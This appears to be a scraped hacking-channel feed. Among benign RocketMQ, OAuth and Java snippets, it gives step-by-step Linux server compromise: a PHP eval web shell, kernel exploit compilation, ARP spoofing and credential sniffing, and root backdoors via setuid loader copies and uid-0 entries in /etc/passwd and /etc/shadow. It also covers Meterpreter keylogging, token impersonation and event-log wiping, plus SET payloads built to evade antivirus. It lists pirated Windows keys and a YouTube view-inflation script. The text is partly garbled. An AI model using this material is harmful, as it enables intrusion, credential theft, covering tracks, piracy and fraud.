▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 T.me Small Termux -Kali Script for increase youtube views

1) git clone https://github.com/Pure-L0G1C/YouTubeViews
2) go to cd YouTubeViews
3) Run as :
python youtube.py [visits] [youtubeLinks

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Common commands for hacking Linux servers
Let s write a php sentence back door: part 1
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php

2) cat rankuplog_time.php

🦑 linux think of cross-site first.

1) Shell browsing target station is not working, type in the command line

ls -la /www.users/

2) Overflow and elevation

# python –c ‘impotr pty;pty.spawn(“/bin/sh”);

3) To get an interactive shell, python is installed by default on most systems

> Enter id

4) bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$

5) Here uid = 529 (zeicom) is not yet root authority,(example)

Enter uname -r
to return: 2.6.18-164.11.1.el5PAE

6) Linux elevation can be roughly divided into

7) Third-party software vulnerabilities

Local trust feature

Kernel overflow

Find the corresponding exp

8) The address is organized here. You can download it here.

http://www.exploit-db.com/search/

9) Enter pwd. This command displays the current directory.
See if you can compile gcc -help

10) The current directory is the directory of the shell, I uploaded 2.c in the shell

11) Bounce the shell to port 12345 of your own machine on the Internet
Nc -lvvp 12345 is monitored locally on the Internet server

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacking A Linux Server
Case when you can get an apache interactive shell sometimes not work-
Recompile arpsniffer methode
part 2
instagram.com/UndercOdeTestingCompany

> At this moment

type in terminal

1) python -c impotr pty;pty.spawn("/bin/sh");
then

2) cd /tmp

3) mkdir Papers

4) cd Papers

5) pwd

6) Then enter the command

7) wget exp. URL..

8) Compile 2.c into executable g ++ keio.cc -o keio

gcc –o 2 2.c

9) Give 2 have execute permission

> chmod +x 2

10) Implementation 2, overflow

./2
1
carried out

11) gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

12) Make sure that arpsniffer.c requires pcap and libnet.

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm

13) wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0

14) tar zxvf libpcap-0.8.1.tar.gz

15) cd libpcap-0.8.1

16) ./configure
> make

make install

🦑 Recompile arpsniffer.c

and execute again

> gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

There was no error this time, and the compilation was successful.
Run

> ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Start cheating Gateway For Any Server :
Because it is server-side, so we cheat Gateway:
(network environment is as follows, the mail server ip: 192.168.0.11 Gateway: 192.168.0.1 the machine: 192.168.0.77)
execution
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Use tcpdump to monitor in another login

tcpdump -i eth0 host 192.168.0.11

Found data, save the monitored data in the file:

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Stop after 10 minutes, download the pop.txt to the local with the sz command under SecureCRT, and then analyze it with Ethereal.

Now we can use linsniffer to listen to the username and password we want.

First modify linsniffer.c: listen to the corresponding application password according to your needs. Mine is as follows:

if(ntohs(tcp->dest)==21) p=1; /* ftp */

if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/

if(ntohs(tcp->dest)==23) p=1; /* telnet */

if(ntohs(tcp->dest)==80) p=1; /* http */

if(ntohs(tcp->dest)==110) p=1; /* pop3 */

if(ntohs(tcp->dest)==513) p=1; /* rlogin */

if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

🦑 Compile and execute

[root@pibigstar root]# gcc -o linsniffer linsniffer.c

Will prompt below

In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c: 32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include < endian.h> instead!

Regardless of the warning, just run the compiled linsniffer.

[root@pibigstar root]# ./linsniffer

The username and password are automatically saved to tcp.log

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How To Get and Use Cross-Site Code against any LInux ?
Linux does not elevate code for cross-directory access
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Linux permissions are usually more loose, but some virtual machines still cannot be accessed across directories.

2) In the case of no rights, try the following code. If you are lucky, you may have passed.

> code show as below:

$path = stripslashes($_GET[ path ]);

$ok = chmod ($path , 0777);

if ($ok == true)

echo CHMOD OK , Permission editable file or directory. Permission to write;

?>

3) Save the above code as tmdsb.PHP

4) Then visit http://www.tmdsb.com/tmdsb.php?path=.../.../the directory to cross / index.php
(example site)

Here index.PHP is the file whose permissions need to be modified.

5) Collected another exp:

6) Save the following code as exp. PHP

Code:

@$filename = stripslashes($_POST[ filename ]);

@$mess = stripslashes($_POST[ mess ]);

$fp = @fopen({$_POST[ filename ]}, a );

@fputs($fp,$mess

);

@fclose($fp);

?>
AFter Using All Parts sended here Finally Linux Kernel <2.6.19 udp_sendmsg Local Root Exploit (x86 / x64) This 0day overflow was successful

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux Backdoor-Let s get full controle :
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
> Udev elevation

1) Changed the udev privilege, applicable to the kernel range of 2.6. *.

2) Still upload the file to the directory where the server shell is located, execute the command ls, find that the file is lying there, and then grant the execute permission to exp.

chmod +x pwnkernel.c

chmod +x wunderbar_emporium.sh

chmod +x exploit.c

3) After execution ./w*overflow

Successful overflow, root permissions.

Leave to IS A that the After Back Door ~ the Add User A the root, the I do Not Mind. . .

useradd -u 0 -o "username"
1
Enter commands one by one

cd /tmp

ls /lib/ld-linux*

cp /lib/ld-linux.so.2 /tmp/.str1ven

ls -l .str1ven

chmod +s .str1ven

ls -l .str1ven

-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

4) Create a backdoor successfully, exit root, execute

./.str1ven which whoami

5) Successfully obtained root permissions ~~

cat /etc/passwd

cat /etc/shadow

cat /etc/sysconfig/network-scripts/ifcfg-ethn

ifconfig

cat /etc/resolv.conf

bash -i

bash prompt:
6) When you enter as an ordinary user with limited rights, you usually have a prompt similar to bash $. When you log in as Root, your prompt will become bash #.

7) System variables:
try the echo "$USER / $EUID"system and it should tell you what users it thinks you are.

echo 1>/proc/sys/net/ipv4/if_forward,1>/proc/sys/net/ipv4/ip_forward

vim /proc/sys/net/ipv4/ip_forward

netstat -an |grep LISTEN |grep :80

service --status-all | grep running

service --status-all | grep http

lsb_release -a

/usr/sbin/sshd stop/
usr/sbin/sshd start

ssd_config file

PasswordAuthentication no

Change it to

PasswordAuthentication yes

Remote ssh can log in

Otherwise displayAccess denied

8) Usepam yes may be used to establish pam login, such as ssh from other Linux hosts to the server. If closed, it cannot be opened.

Novice usage of su
first

chomod 777 /etc/passwd

9) Then change the gid and uid of the bin user to 0

Then passwd set the bin password

then

cp /bin/bash /sbin/nologin

Then su

su - bin

10) You can go to the rootshell.

The principle is that when ssh does not allow root to log in with the ssh terminal, we do not know the root password in a very novice way.

It's okay

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

cp /dev/null /var/log/wtm

11) Create a 100m large file to use when using Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit

dd if=/dev/zero of=yourfile bs=10M count=10
/etc/init.d/ssh start

/etc/ssh/sshd_config

🦑Well Done! -remember exploiting others linux is illegal

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Three ways to send messages 2020 by Underc0de :

> Send synchronously
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Producer can be blocking or non-blocking when sending messages. There are three types of transmission methods, which are synchronous, asynchronous, and one-way (ONEWAY). send()The method that was introduced earlier to return SendResult is blocking.

2) It must wait until the Broker has responded before returning to continue execution. For the following code, the second message can be sent only after the first message is sent, and then the third message. This blocking sending method is also called synchronous sending, and its overall response time also includes possible retry time.

3) Internally, it will retry twice by default. You can setRetryTimesWhenSendFailed()specify the maximum internal retry times when sending synchronously.

@Test
public void testSyncSend() throws Exception {

DefaultMQProducer producer = new DefaultMQProducer("group1");
//Name Server
producer.setNamesrvAddr(nameServer);
producer.start();
for (int i = 0; i < 10; i++) {

Message message = new Message("topic1", ("hello" + i).getBytes());

SendResult sendResult = producer.send(message);
if (sendResult.getSendStatus() == SendStatus.SEND_OK) {
System.out.println("消息发送成功：" + sendResult);
} else {
System.out.println("message..：" + sendResult);
}
}

producer.shutdown();
}
————————————————
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 methode 2 for sending message : Send asynchronously
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The calling send()thread will block when sending synchronously , and the current thread will not block when sending asynchronously.

2) The send result will be called back by a callback function. The following code is an example of sending a message asynchronously.

3) The difference from sending a message synchronously is that it sends an additional SendCallback object when sending a message.

4) This method returns immediately after calling this method without waiting for the response from the Broker.

5) The corresponding method of the SendCallback object will be called back after the message is sent successfully or fails. So for the following example, the second message is sent when the first message has not been confirmed by the Broker and the third message is the same. The order in which they are successfully sent by the Broker is actually uncertain.

@Test
public void sendAsync() throws Exception {
DefaultMQProducer producer = new DefaultMQProducer("group1");
producer.setNamesrvAddr(nameServer);
producer.start();
CountDownLatch latch = new CountDownLatch(10);
for (int i = 0; i < 10; i++) {
Message message = new Message("topic1", ("send by async, no." + i).getBytes(RemotingHelper.DEFAULT_CHARSET));
producer.send(message, new SendCallback() {
@Override
public void onSuccess(SendResult sendResult) {
System.out.println("..：" + message);
latch.countDown();
}

@Override
public void onException(Throwable throwable) {
System.out.println("...");
latch.countDown();
}
});
}
latch.await();
producer.shutdown();
}

twenty one
twenty two
twenty three
twenty four
25...

6) If sending an asynchronous message fails, it will also retry internally. The maximum number of retries is setRetryTimesWhenSendAsyncFailed()specified, and the default is 2.

ONEWAY
————————————————

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ONEWAY - sms sending addition information by Underc0de :
In addition to synchronous sending and asynchronous sending, there is also a sending method called ONEWAY.

> Its sending is one-way, that is, it does not need to wait for the response from the Broker. It only needs to send, regardless of the success or failure of sending. It is usually used in scenarios where messages are not so important and can be lost. It is sent by calling sendOneway().
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

@Test
public void sendOneway() throws Exception {
DefaultMQProducer producer = new DefaultMQProducer("group1");
producer.setNamesrvAddr(nameServer);
producer.start();
for (int i=0; i<10; i++) {
Message message = new Message("topic1", "tag2", ("message send with oneway, no."+i).getBytes());
producer.sendOneway(message);
}
producer.shutdown();
}

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Windows 10 2020 Lastest Serials
Note : If Serial Activation error( non official server win... ) - try official free KMS
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Windows 10 Enterprise N 4CPRK-NM3K3-X6XXQ-RXX86-WXCHW

Windows 10 Enterprise QFFDN-GRT3P-VKWWX-X7T3R-8B639

Windows 10 Professional N VK7JG-NPHTM-C97JM-9MPGT-3V66T
Windows 10 Education DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ
Windows 10 Enterprise 2018 LTSB YTMG3-N6DKC-DKB77-7M9GH-8HVX7
Windows 10 Home Key 2F77B-TNFGY-69QQF-B8YKP-D69TJ
Windows 10 Enterprise 2018 LTSB N DXG7C-N36C4-C4HTG-X4T3X-2YV77
Windows 10 Professional WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2018 LTSB N WYPNQ-8C467-V2W6J-TX4WX-WT2RQ
Windows 10 Enterprise G DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Home Singe Language YNMGQ-8RYV3-4PGQ3-C8XTP-7CFBY
Windows 10 Pro 44RPN-FTY23-9VTTB-MP9BX-T84FV
Windows 10 Enterprise 2016 LTSB 84NGF-MHBT6-FXBX8-QWJK7-DRR8H
Windows Pro N for Workstations NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Home Single Language 8PTT6-RNW4C-6V7J2-C2D3X-MHBPB
Windows 10 Professional Workstation YVWGF-BXNMC-HTQYQ-CPQ99-66QFC
Windows 10 S GJTYN-HDMQY-FRR76-HVGC7-QPF8P
Windows 10 Home Country Specific YYVX9-NTFWV-6MDM3-9PT4T-4M68B
Windows 10 Education N XGVPP-NMH47-7TTHJ-W3FW7-8HV2C
Windows 10 Enterprise Evaluation NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Home + Office 2016 Professional Key MNXKQ-WY2CT-JWBJ2-T68TQ-YBH2V

Windows 10 Enterprise NW6C2-QMPVW-D7KKK-3GKT6-VCFB2

Windows 10 Pro + Office 2016 Professional Key MNXKQ-WY2CT-JWBJ2-
T68TQ-YBH2V

Windows 10 Education N DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ

Windows 10 Education Key WYPNQ-8C467-V2W6J-TX4WX-WT2RQ

Windows 10 Education QFFDN-GRT3P-VKWWX-X7T3R-8B639

Windows 10 Enterprise Key 84NGF-MHBT6-FXBX8-QWJK7-DRR8H

Windows 10 Pro N 2F77B-TNFGY-69QQF-B8YKP-D69TJ

Windows 10 Pro Key VK7JG-NPHTM-C97JM-9MPGT-3V66T
Windows 10 Home WNMTR-4C88C-JK8YV-HQ7T2-76DF9

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Fix Problem Kali-Parrot error install (try again)
problems when attempting to install - Kali Linux 1.0.6 64 Bit ISO - the error is exactly the same every time well let Fix
T.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) let mention that the same error occurs on 2 different computers as well, when it comes to - installing the system - and the error pops up after 4-5% into the installatjon process.

2) ... so.... after som trial and error with different mediums, DVD - USB stick, different burning options, USB-preps etc... i download - Kali Linux 1.0.6 64 Bit Mini ISO - to see if i am able to get Kali Linux installed on my stationary computer.

3) Everything seems perfect , the installstion alternatives pops up, and the fun begins.

> 1st try: i don't modify the list that appears
result - Failure : installing the system

> 2nd try: i remove the SSH server option
resukt - Failure: installing the system

> 3rd try: removing the pen-test-pack
result - installation proceeds uninterrupted

...in a logic sense, this point to that the pen-test-pack has som kind of bug or something...or?

> Anyway, is there an option to install the - pen-test-pack

Well done ! Any doubt feel free to ask

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The OAuth2.0 protocol Full Tutorial by Underc0de :
OAuth2.0 is a relatively popular authorization mechanism in recent years. For ordinary users, you may use it every day . Most of the third-party logins we often use are based on OAuth2.0 . With the interconnection of applications and the invocation of personalized services, open authorization becomes an objective need.
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Simple understanding of OAuth2.0

1) OAuth defines the following roles and clearly distinguishes their respective concerns to ensure that a consistent authorization service is quickly built:

2) Resource Owner , usually refers to the end user, whose role is to agree or reject, or even selectively request authorization to third-party applications.

3) User Agent refers to some channels authorized by the resource owner. Generally refers to the browser, APP

4) A client program that requests authorization and requests to access restricted resources.

5) Authorization Server A server that authenticates a user's authorization and responds with an authorization response based on the authentication result.

6) Resource Server A server that can accept and respond to requests for protected resources.

7) Isn't the mere textual description a bit difficult to understand? So here I will personally illustrate the above four concepts with an example. It's the season for programmers to interview again. One year I went to interview, only to find such a "tall" on the place.

🦑 The visitor needs to pass the verification code to pass the gate. I contacted the interviewing company's HR. It gave me a link, and after opening it, a WeChat applet gave the following process:

1) Example if I sent an interview request to the interview company (HR).

2) HR gave me a link where I could get an entry permit request.

3) I made a request to enter through the link.

4) The request got a response and returned me a verification code.

5) I enter the verification code in the gate program.

6) Release after verification.

7) After I studied the OAuth2.0 protocol, I found that this experience can reflect some of the design concepts of OAuth2.0 .

8) Visitors must be authorized to access the building. In this way, people and other people are prevented from entering and leaving the office, and the visitor is controllable (from the time and number of visits), and even the access to the floor can be controlled (of course not in the above example).

9) Combined OAuth2.0 know visitors is the Client, the company (the owners) is the Resource Owner, property is the Authorization Server, the gates is the Resource Server, gates, there may also be subject to control property .

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to gain access of OAuth accessBased on the above principles, OAuth 2.0 has the following points that need to be clearly recognized:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) OAuth2.0 is not an identity authentication protocol. Although identity authentication is involved in the authorization process, the OAuth2.0 protocol itself does not process user information. When a client accesses a protected resource, it does not care about the owner of the resource.

2) OAuth2.0 does not provide some message signatures. In order to ensure security, it should not be separated from Https . When using other protocols or systems, a security mechanism should also be specified to assume the tasks undertaken by Https .

3) OAuth2.0 does not define the encryption method, although the JOSE specification is currently used more

4) OAuth2.0 Although the token is held and used by the client, the client cannot parse and process the token.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What are the limitations of Java's anonymous inner classes?
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Ubiquitous anonymous inner classes

button.setOnClickListener (new OnClickListener () {

});

In the virtual machine, the anonymous inner class has a name, OuterClass $ 1

class RunnableFoo extends Foo implements Runnable {

};

Anonymous inner classes cannot be written like this, but local classes can be written, but kotlin can be written like this val runnableFoo = object: Foo (), Runnable {}

Constructor of anonymous inner class, generated by the compiler, the parameter list includes

1) External objects (defined in a non-static domain)

2) External objects of the parent class (parent class is not static)

3) the constructor parameter of the parent class (the parent class has a constructor and the parameter list is not empty)

4) Externally captured variables (references to external final variables in the method body)

🦑 Anonymous inner classes are prone to memory leaks

to sum up

1) No name in human cognitive sense

2) can only inherit a parent class value to implement an interface

3) the parent class is a non-static type, optionally requires an external instance of the parent class to initialize

4) If it is defined in a non-static scope, it will reference an external class instance

5) can only capture final variables in external scope

6) When creating an interface with a single method, it can be transformed with a lambda


Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Controlling Meterpreter full-kali-parrot-debian-root termux :

> Meterpreter is a killer in the Metasploit framework. It is usually used as an attack payload after exploiting the vulnerability.

> The attack payload can return to the user a control channel after the vulnerability is triggered.

> When using Armitage, MSFCLI, or MSFCONSOLE to obtain a Meterpreter connection on the target system, the user must use Meterpreter to pass the attack payload. MSFCONSOLE is used to manage user sessions, while Meterpreter is the interaction between attack payloads and penetration attacks. This section will introduce the use of Meterpreter.
instagram.com/UndercOdeTestingCompany

🦑Meterpreter includes some common commands as shown below.:

help: View help information.

background: Allows users to have Meterpreter sessions in the background.

download: Allows users to download files from intruding hosts.

upload: Allow users to upload files to the intruding host.

execute: Allows users to execute commands on the intruding host.

shell: Allows users to run Windows shell commands on the intruding host
(Windows host only).

session -i: allows users to switch sessions.

🦑 Control is achieved by opening MSFCONSOLE. The specific operation steps are shown below:

1) Start an active session on MSFCONSOLE.

2) The login keyboard input is initiated by the user of the system. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke sniffer…
From the output, you can see that keyboard input sniffing is enabled.

3) Capture keyboard input from users of vulnerable systems. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokes…
<Return> www.example.site.. <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>

information indicates that the user entered
, www.example..., the enter key, and the exit key in the vulnerable system.

4) Stop capturing keyboard input from users of the vulnerable system. The execution command is as follows:
meterpreter > keyscan_stop
Stopping the keystroke sniffer…
From the output, you can see that keyboard input sniffing has stopped.

5) Delete a file on the vulnerable system. The execution command is as follows:
meterpreter > del exploited.docx

6) Clear the event log on the vulnerable system. The execution command is as follows:
meterpreter > clearev
[*] Wiping 57 records from Application…
[*] Wiping 107 records from System…
[*] Wiping 0 records from Security…

7) The output information shows all processes running in the vulnerable system, including the process ID number, process name, system architecture, user, and the path of the running program.

8) Use kill to kill the process number specified in the vulnerable system. The execution command is as follows:
meterpreter > kill 2040
Killing: 2040

9) Attempt to steal a fake token from the vulnerable system. The execution command is as follows:
meterpreter > steal_token

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to obtain a Meterpreter Shell Using fake tokens by Underc0de :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

In order to obtain a Meterpreter Shell, users must use Metasploit to attack a host before they can successfully establish a Meterpreter session. The method of using Metasploit to attack the host is described before on undercode chats groups ,and will not be repeated here. The specific steps for using token impersonation are shown below.

1) Start a Meterpreter session. The execution command is as follows:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1…
meterpreter >
From the output, you can see that the Meterpreter session was successfully started.

2) Use the use incognito command to load the incognito module, and then enumerate the tokens. The execution command is as follows:

meterpreter > use incognito
Loading extension incognito…success.

3) now in output on your script see that the list of currently valid token commands is list_tokens. After executing the above command, a large amount of information will be output. Due to space reasons, part of the content is replaced by ellipsis (...).

🦑 List all tokens. The execution command is as follows:

meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
===============================================
AA-886OKJM26FSW\Test
Impersonation Tokens Available
===============================================
No tokens available
From the output information, you can see that the valid tokens allocated are AA-886OKJM26FSW \ Test. AA-886OKJM26FSW indicates the host name of the target system, and Test indicates the user name for login.

4) Use the impersonate_token command to impersonate the Test user for attack. The execution command is as follows:
meterpreter > impersonate_token AA-886OKJM26FSW\\Test
[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user AA-886OKJM26FSW\Test
From the output information, you can see that the fake Test user succeeded. At this point, you can perform any operation in the target system by elevating your permissions.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Note: You need to enter two backslashes (\) when typing HOSTNAME \ USERNAME.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Launching the Social Engineering Toolkit :
Before using the Social Engineering Toolkit, you need to launch the tool. The specific operation steps are shown below.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Start SET. Execute the following command in the terminal:

> root@kali:~# setoolkit

>Or select "Applications" | Kali Linux | "Exploit Toolkit" | Social Engineering Toolkit |

2) Select Attack Social Engineering here, the number in the menu is 1, so enter 1 after set>, and the following information will be displayed:
set> 1

🦑 Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) SMS Spoofing Attack Vector

8) Wireless Access Point Attack Vector

9) QRCode Generator Attack Vector

10) Powershell Attack Vectors

11) Third Party Modules

99) Return back to the main menu.
set>
set>

🦑 information shows the menu options for attacking social engineering, at which point you can choose the type of attack engineering and then attack.

1) Choose to create an attack payload and listener here, enter the number 4, example

2 ) The target system of the attack in this example is Windows XP 32-bit, so select number 2 here. As follows:
set:payloads> 2

3) Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting

🦑 in order to get around basic AV detection.
1) shika..
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
The output information shows several ways to obtain an AV-based attack.

5) Select the fourth type and enter the number 4
E N J O Y B Y U N D E R C O D E

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How Dump Hack data- Collecting Target System Data
The attack payload was passed to the target system and the session was successfully established. well lets start !
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

When a session is successfully established, an attacker can collect its data from the target system. Collect the data of the target system to enable users to use this information as far as possible for further penetration attacks. Collecting data for the target system is described below. The specific steps to collect data for the target system are shown below.

1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

2) Turn on the keylogger. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke sniffer…

3) Collect data from the target system. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokes…
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34
From the output information, you can see that the target system has executed the Enter key, entered numbers 1, 2, and 34.
7.3.4 Clear trail

4) When an attacker invades the target system, any operation performed by the attacker may be recorded in the target system's log file. In order not to be found by the target system, it is very important to clear the trail. Because if it is found, it can cause a lot of trouble. Now users don't need to worry about this problem, because Metasploit provides a way to easily remove all traces. Here's how to use Metasploit to clear your tracks.

🦑 The specific steps to clear the trail using Metasploit are shown below.


1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

2) The irb command in Metasploit can clear the trace. The execution command is as follows:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
When you see the >> prompt in the output, it means that the irb command was successfully run.

3) Set the log you want to delete. The common log options are as follows:
log = client.sys.eventlog.open ('system');
log = client.sys.eventlog.open ('security');
log = client.sys.eventlog.open ('application');
log = client.sys.eventlog.open ('directory service');
log = client.sys.eventlog.open ('dns server');
log = client.sys.eventlog.open ('file replication service').
Clear all logs here. The execution command is as follows:
>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')

4) After executing the above command, it means that the log to be cleared is specified. Next, you need to execute the log.clear command to clear the log file. The execution command is as follows:
>> log.clear

5) After executing the above command, the user's trail will be hidden.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁